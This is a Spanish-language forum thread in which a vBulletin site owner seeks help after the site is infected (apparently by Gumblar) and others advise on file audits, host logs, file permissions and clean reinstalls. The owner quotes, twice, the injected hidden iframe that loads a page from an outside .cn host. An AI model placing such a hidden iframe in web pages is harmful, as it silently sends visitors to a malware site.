virus o troyano en mi foro

Te inyectaron codigo en algun lado. Haz una auditoria de archivos y mira cada archivo que no lo reconozca como vbulletin o este modificado con respecto al default.

Esto es por algun bug de seguridad

Como he de hacer eso de auditoria de archivos?

En el panel de administracion>> Mantenimiento>> diagnostico>> Revisar Versión de Archivos >> Esta función listará cada uno de los archivos de tu vBulletin que esté etiquetado con una versión diferente a la que muestra tu foro

Pues vereis en el index.php abajo de todo el codigo y tras la etiqueta de cierre ?> he localizado esto:

Código:

<iframe src="http://yourlitetop.cn/ts/in.cgi?mozila9" width=2 height=4 style="visibility: hidden"></iframe>

lo he borrado y lo he vuelto a subir de nuevo, pero seguro que volvera a aparecer! tenemos alguna forma de hacer que no pueda ser escribible el fichero?

Gracias de nuevo!

Seguro estan vulnerando tu clave de ftp, esto debe ser porque es debil, porque estan ingresando a tu maquina o porque hay un problema de seguridad en el servidor. Pide un log al host para ver por donde entraron.

La contraseña que tengo para el ftp es bastante larga y compleja, alternando tambien entre mayusculas y minusculas...

he visto que ese mismo iframe lo tenia insertado tambien en el index.html que esta dentro de la carpeta clientscript

Iniciado por sienteasturias

Pues vereis en el index.php abajo de todo el codigo y tras la etiqueta de cierre ?> he localizado esto:

Código:

<iframe src="http://yourlitetop.cn/ts/in.cgi?mozila9" width=2 height=4 style="visibility: hidden"></iframe>

lo he borrado y lo he vuelto a subir de nuevo, pero seguro que volvera a aparecer! tenemos alguna forma de hacer que no pueda ser escribible el fichero?

Gracias de nuevo!

Cambiale los permisos CHMOD y ve a este tema:
http://www.vbhispano.com/foros/f18/q...er+ante+hackeo

Donde varios amigos opinan acerca de cómo actuar ante un hackeo,

Bueno ya casi más o menos he limpiado el foro, mira que me ha dao trabajo... despues de ir leyendo por la red casos similares de este virus. Lo que si he visto es que no solo afecta a los index.php, o index.html como he leido en más de una ocasion en diferentes páginas, sino que llega a poder escribir el código en mas archivos e incluso en las carpetas images que tengas por la red se crea un archivo nuevo con el nombre images.php y en ese arvhivo esta inyectado el código nuevamente.

Ahora ya no me sale el aviso de que la pagina tiene codigo malicioso, pero tanto al pulsar sobre un tema del foro, asi como cuando se responde a un tema en la parte de abajo del navegador sigue mostrando: "conectando a gumblar...." y tarda un poquillo en visualizarse el tema o postear en el tema, he estado revisando uno por uno los archivos y ya no he encontrado más código en ningun sitio, pero eso sigue saliendo, alguna sugerencia donde se puede estar metido eso poco que me falta por limpiar?

Gracias!

No te inditifica que archivo es, si te muestra el antiviruz, limpialo con el fpt.

Lo ponen en esos archivos porque son los que originan la pagina , no tendria sentido hacerlo en otros archivos. No te confies y vuelvo a decirte que pidas un log al host e identifiques por donde entraron. Eso se hace de forma manual. El atacante no le interesa tirar tu foro (lo podia haber hecho tranquilamente) solo le interesa usarte de mula para infectar a navegantes que ingresen a tu foro.

Por ultimo las claves seguras no necesariamente tienen que ser largas y el tema de la mayuscula o minuscula no es tan relevante. Es mucho mas efectivo que tengan caracteres como $?

Lo del antivirus en la mayoria de los casos no sirve para nada porque lo que hacen es ponerte un codigo que te lleva a otra pagina donde esta el troyano, no ponen el troyano directo en tu web. Es bastante comun esta practica por paginas ****o rusas.

La mejor manera es pisar todos los archivos con una copia fresca, no se si sera necesario hacer un finalupgrade. La verdad que no se si es necesario este ultimo paso.

De lo que estpy seguro es que esto sucede por dos razones si tienes tu foro actualizado. O vulneran la clave o tienes mal los permisos de arfchivos y carpetas en el server. Si todo eso esta bien, me inclino a pensar de que es un tema de seguridad del server. Hace años cuando tenia otra web de otro estilo, tuve varios meses este problema y no se soluciono hasta que me cambie de servidor ya que a pesar de que era un buen server, no le hacian los parches de seguridad correspondientes.

El foro lo tengo actualizado a la última versión actual, la 3.8.2. No se si los permisos estaban correctamente, por ejemplo los index.php estaban como 644, pero he tenido que ponerles a 444, de este modo es como ha paralizado la entrada a este virus puesto que no puede escribir en ellos. El tema de este virus por lo que he leido es bastante reciente pero hay mogollón de gente infectada por ello. Leia en bastantes web información , en muchos casos siempre leia siempre lo mismo, que afectaba a los index, con lo cual subia los archivos limpios y les ponia el chmod a 444, pero claro fue ayer a lo largo del día cuando llegue a una red y leia lo que también afectaba en las carpetas images y que se creaba un archivo images.php también donde se ponia el codigo, con lo cual antes de ayer que habia subido nuevamente todos los archivos del foro no sabia de estos archivos tambien, con lo cual ayer despues de leer lo de la carpeta de images comprobe y efectivamente ahi estaba el archivo, dentro del directorio del foro como en más partes de la web! Por cierto esto no iria aqui pero a raiz de que como os conte antes que habia resubi practicamente todo el foro, ahora en mi panel de control del admin me ha desaparecido la opcion del arcade, para los juegos que tengo en el foro y asi mismo el hack de easy_pages, he vuelto a subir los archivos de esos dos hacks pero no me salen en la administración, sim embargo si funcionan ambas cosas. a ver si me podeis decir que ha podido pasar!

Hace poco se metió este: Trojan.Brisv.A!inf
Mi antivirus no pudo eliminarlo y me recomendó que lo elimine manualmente (en Save Mode) ahora ya pudo bloquearlo.

A ver...

Si te vamos a decir lo que tienes que hacer y no lo haces, volviendo a poner un post pasando por alto lo que te decimos, no vamos a llegar a ningun lado satisfactorio. Pretendes que nosostros usemos "la videncia" para solucionar tu problema cuando lo que tienes que hacer es ver por donde entraron, la unica manera fiable de saberlo es ver el log de tu server, ahi quedo registrado todo. En base a ese dato, podremos enfocar un correcto soporte, sino son decenas de post sin llegar a nada.

1. Revisa el log de actividades (AHI ESTA LO QUE PASO)
2. Reemplaza con una copia nativa todo tu vb
3. cambia las claves usando caracteres $?
4. Coloca los permisos correctamente
5. Escanea tu ordenador por lo menos con tres antivirus online (kapersky, panda, esset) para ver si no levantan las claves de asi.
6. El ordenador que se usa para administrar el foro debe estar detras de un Firewall para evitar intrusiones.
7. Si alguna vez usaste algo null, realiza una auditoria a los archivos y elimina todo lo que este de mas

Si vuelve a pasar despues de todo eso, con seguridad es un problema de seguridad en tu servidor y si el soporte de tu host no te da una respuesta satisfactoria empieza a pensar en una migracion.

Estadisticamente el 80% de hosting mundial es de baja calidad, tienen buenos servers pero no le hacen el mantenimiento semanal adecuado, los ponen online y hasta que no explotan no se ocupan.

Con los datos que nos proporcionas no podemos hacer mas que esto por ti.

esto paso con mi servidor , uso joomla y vbulletin
tube que reiniciar todo , formatiar el servidor con la empresa afiliada ya que tenia muchos bug
revisa todos los index.html , y los php